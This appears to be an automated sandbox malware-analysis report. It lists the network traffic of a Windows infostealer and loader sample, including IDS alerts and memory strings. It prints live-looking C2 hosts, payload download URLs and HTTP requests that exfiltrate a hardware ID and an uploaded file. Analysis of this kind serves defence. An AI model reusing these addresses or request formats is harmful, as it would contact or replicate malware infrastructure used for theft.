a2 29 e3 f2 2a 80 ec da 0a 06 5f 21 10 8b 6f 80 a4 36 12 50 67 e1 75 55 28 4a 83 9c 62 e0 cf 64 77 ac 86 e1 fe c7 93 14 07 ff f3 e8 6a 8f 13 38 8c 46 61 de d7 b7 a0 56 54 92 5e 39 0e fe f4 8e 56 ef 2c 8f 5e da 35 8c ea 5a f4 81 95 01 7f 74 3c de 82 09 1d 53 06 e8 ae 20 07 e7 87 7a af 85 f8 b3 b2 fb e9 6d 1f e5 1f 43 b1 6c c2 a0 89 94 03 3b 82 67 32 3d d8 91 e3 94 2c a3 6a 4f 03 51 da b8 7e c6 ad d9 d3 d7 02 62 6c 9a 23 07 ad a4 17 68 1f b0 70 4a d3 06 7f 16 18 ad 71 7f 90 6f 5b d5 c6 b4 46 d6 d8 18 e9 a5 2a 0e 2c 66 c0 3d 1b 0e 74 e4 38 d3 26 12 2a 42 cd d4 2d ba 61 83 7c a2 11 e7 1c e0 0e 94 d3 a9 d6 54 25 27 fd 35 50 4a 71 c1 18 c5 ea 07 e8 7d 79 be 2c da a7 c8 a5 ab e7 64 81 ed 0e 23 a9 ed 5e f8 04 90 41 6e 50 98 47 00 06 93 13 84 bf 83 c4 e5 3c 29 08 fd a5 67 5b 59 68 c0 90 36 09 19 b4 e2 13 ce a2 12 fe 74 41 ed e7 36 09 d7 da 6c f1 9e 47 9f 1c 6e 19 62 fc 5e 6c d8 e4 ab cf 8a 36 93 c0 18 c4 ab 77 02 1f c9 2d 90 43 0b 70 99 78 3f 14 2e 90 c4 fd 2c ac 1b 8d c2 a1 d0 96 1e 8e cf b9 ef 83 11 e8 0d 0d 7d 4b 33 43 d0 c0 82 6a df d6 7d 8f 96 ca 69 d7 60 93 03 17 29 9c 72 a5 b6 c0 c3 f7 f6 a3 6e e5 2d 0b b7 d7 9a 24 c6 a6 5d e8 30 e1 ee 55 c4 68 86 bc a6 ed 10 fc ce 42 e1 1a c3 cf 81 a8 63 6c fd 64 c0 aa 28 9e 10 0f 26 5b 2d 19 94 68 6a 0f d8 f8 db 4d e8 fa a2 e9 c1 0b 16 00 e5 c2 bf 19 c9 ff 07 a6 29 a5 71 f3 a4 28 35 91 a6 0c 41 65 70 c4 2d e7 fa f3 41 9d e0 a8 12 07 86 43 0a a6 69 70 a1 a1 29 49 65 e4 8f 96 97 93 c9 7b 01 2b ae a3 a6 86 75 20 ce ee d9 07 00 82 d0 d0 90 a2 a1 68 4c d5 05 77 cb 9a c0 b9 64 af 59 81 2a 75 e6 b0 37 e7 4a 7c 47 36 f9 f0 91 79 1e d3 35 13 ea 14 6e 47 83 5c 1f 98 29 3f cb f9 4c ea 1a ae 9a a3 96 36 ca 27 6b 83 e2 75 b2 af 77 87 6d cc fe 08 7f 0f 75 64 f6 c0 39 c7 d5 a7 e7 6f 34 2e e1 94 f6 64 d7 c8 f8 99 50 4d d0 ee 00 73 cc 95 38 99 e3 07 4f 43 8e 8c 2b 77 90 55 76 44 97 6d ed 22 10 1c 8a a7 62 b9 17 5b d1 66 97 6e 39 01 dc 19 63 2c 9f d2 61 5b e2 8b b6 5b 0a 2d 89 cc a0 63 fb 84 26 7b 1d 92 b0 2e 98 41 88 b3 3a 05 06 6d 5d 15 a4 b9 a0 86 11 25 bf 1a 29 d9 e3 bf ea 2e fe ac ea 95 02 8d 29 fc 9b 29 18 be d4 04 67 02 46 3e 6b a9 08 01 89 3c b3 f1 38 52 0f 61 44 c3 ed
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007747001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 2d 2d 0d 0a Data Ascii: ------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="build"mars------BAAEHDBFIDAFIDHJEBFB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007748001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27554Content-Type: multipart/form-data; boundary=------------------------4OjR0bBU5kAiBEmf5D72UwData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 4f 6a 52 30 62 42 55 35 6b 41 69 42 45 6d 66 35 44 37 32 55 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 74 6f 73 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d6 f9 dd 56 d1 63 7c d5 de b9 5f 4a dc e5 23 0a 8a cc 61 cb ed 15 1b 96 8c 80 3e 1b dd cf 5f b8 bf f9 df c3 14 95 49 e6 ae d5 f8 ff f9 48 95 52 f1 cd 8b c4 f6 e3 a8 4f ed 29 52 04 51 53 ea ac 7d 30 a6 eb 7b 9d 96 55 b0 ff 04 02 ff 91 70 ad 6c f0 6c 04 d5 4c 70 4b d9 cf 11 c8 17 e2 bc ea 58 2c 1d 50 9b 85 f0 af 0f 12 60 3b 87 03 ef d7 a8 cf 37 30 0e a7 de 1e 55 e2 cc 79 df 10 20 8f f4 b6 80 3c a4 df 54 09 46 93 df c4 90 e9 af f4 25 0b 09 a6 9a 6b 27 70 bb 58 57 e0 f6 5a 74 63 66 9f 4f 97 58 0b e2 ea 91 b0 68 51 a6 55 3e ab e9 ed db f3 a3 fc ba 7e 74 cd ba 06 62 33 04 ba 9a 29 8c f0 cb be a5 c8 4c 72 c3 98 4e fa c7 44 4c b6 3f 4a 80 49 eb 7b 6d 85 fc c8 50 92 48 ee c1 b6 c8 90 91 33 60 92 6f 15 31 3b d3 88 67 a9 7b 88 49 fa 8c 6b e1 fe b6 ad b9 13 03 34 3e 74 8b 92 0b 43 06 ee ca 57 9a 63 4c 9e a4 f8 4d 70 35 48 17 83 2f eb 4a 4e 83 54 5a 66 1b 55 36 8f ab cf 00 ce 38 9d bf 81 e9 d4 c2 a8 4b 3a ec f0 6f f2 b9 a2 a6 21 47 6b 20 2d b3 49 c8 db bf e0 86 41 be cb f8 5f f5 80 8f 88 d0 b2 ea f2 88 36 87 c9 14 88 13 98 b3 55 42 c0 05 80 46 81 0e 28 8d 33 11 a8 2c 8b f3 47 db 1a af 36 0a 06 51 eb e4 dd c4 cd e8 95 01 77 34 ea 3b 98 5f ed 21 87 e9 b8 4b aa a5 29 3e c9 20 c0 3b 59 2c 4f 15 8c d8 43 f3 85 89 1a 64 7e 9a c3 b9 b6 46 b1 62 7c 22 1e c7 e6 0b 7d c8 b2 2f 99 cd d1 f4 aa 63 94 5c 61 a3 97 11 57 44 11 c2 d4 ab 37 41 0a be 11 58 42 77 08 b0 7d 75 cd 8a 9a 27 6e b9 1f 98 72 a6 64 88 d9 39 51 2d 40 6b 86 ee ac cf 55 4b 07 1c 09 4b 3d 5b 49 f6 82 1d af 6a e8 c3 31 d8 0f c6 1c 6e 3b b3 15 b9 78 75 2f 73 a8 03 93 17 9e 39 62 4d c6 ca 71 4d 28 b9 c0 8a ce 4e 7b a8 11 ed 12 a3 64 89 e8 c7 66 26 45 3f 5f 11 de 38 a8 f5 6f 84 21 5c 2c cc 27 d9 9c 4b b0 52 c9 ac 95 8d 81 5f 95 49 88 20 b0 8d c0 69 46 15 55 d0 57 00 35 02 08 6b 49 99 95 eb 50 d5 aa 5c d3 3c c4 ca 35 e2 2d e4 e7 90 5d 7b 96 ac cb e7 ac bd 25 cd f2 0d 9d e8 89 32 42 88 b9 32 4a f2 8d 18 40 5b 75 b2 7c 7d 97 f2 ee 46 e1 a9 33 d5 e0 a2 cf 14 03 df 5b d5 34 5a ad f7 18 c3 fd ce 5d 2d b1 d2 77 ef ee a6 94 7c 2e 90 f6 54 41 96 be 6e 4c b8 38 95 4c b9 8a f9 98 69 b6 2a 8b 9a 26 86 3c 1c 04 9a 29 cf 27 17 50 3c 84 7d 0e 7c a0 3e a9 72 fb 4b e4 72 11 7c 18 3b 77 99 49 43 51 57 f5 8c 6a 51 b6 89 59 d5 63 c9 28 91 51 d3 6e c9 e8 90 f3 8e 72 ab dc 29 c3 4a 16 6f 6a 3d fc 99 4d ab 7d 4d 34 f1 09 c4 f8 27 12 96 c7 20 e2 c3 20 9f e7 01 bf e6 32 1b 4b 64
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="build"mars------AFIEGCAECGCAEBFHDHIE--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 172.67.155.248 172.67.155.248
Source: Joe Sandbox View IP Address: 104.21.85.146 104.21.85.146
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49811 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49825 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49847 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49851 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49875 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49897 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49905 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 172.67.155.248:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000ABE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_000ABE30
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/Lumma111.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*ad-blk**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://vast.adsafeprotected.com/vast**://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://ads.stickyadstv.com/auto-user-sync**://*.adsafeprotected.com/*/Serving/**://*.adsafeprotected.com/jload?**://securepubads.g.doubleclick.net/gampad/*ad**://*.adsafeprotected.com/jsvid?**://trends.google.com/trends/embed*--panel-banner-item-info-icon-bgcolor*://track.adform.net/Serving/TrackPoint/**://pixel.advertising.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://ads.stickyadstv.com/user-matching**://*.adsafeprotected.com/*/imp/*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg*://auth.9c9media.ca/auth/main.js*://www.rva311.com/static/js/main.*.chunk.js*://libs.coremetrics.com/eluminate.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjs*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*FileUtils_closeAtomicFileOutputStream*://pub.doubleverify.com/signals/pub.js*@mozilla.org/network/file-output-stream;1@mozilla.org/addons/addon-manager-startup;1@mozilla.org/network/atomic-file-output-stream;1webcompat-reporter@mozilla.org.xpi*://www.google-analytics.com/gtm/js**://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.vidible.tv/*/vidible-min.js**://cdn.optimizely.com/public/*.js*://s.webtrends.com/js/advancedLinkTracking.js*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/analytics.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://www.googletagservices.com/tag/js/gpt.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://www.google-analytics.com/plugins/ua/ec.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: p10tgrace.sbs
Source: global traffic DNS traffic detected: DNS query: processhol.sbs
Source: global traffic DNS traffic detected: DNS query: librari-night.sbs
Source: global traffic DNS traffic detected: DNS query: cook-rain.sbs
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Https://docs.google.com/
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeE
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeT
Source: cfc45d1c7c.exe, 0000000A.00000003.2937034827.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeP
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exePm
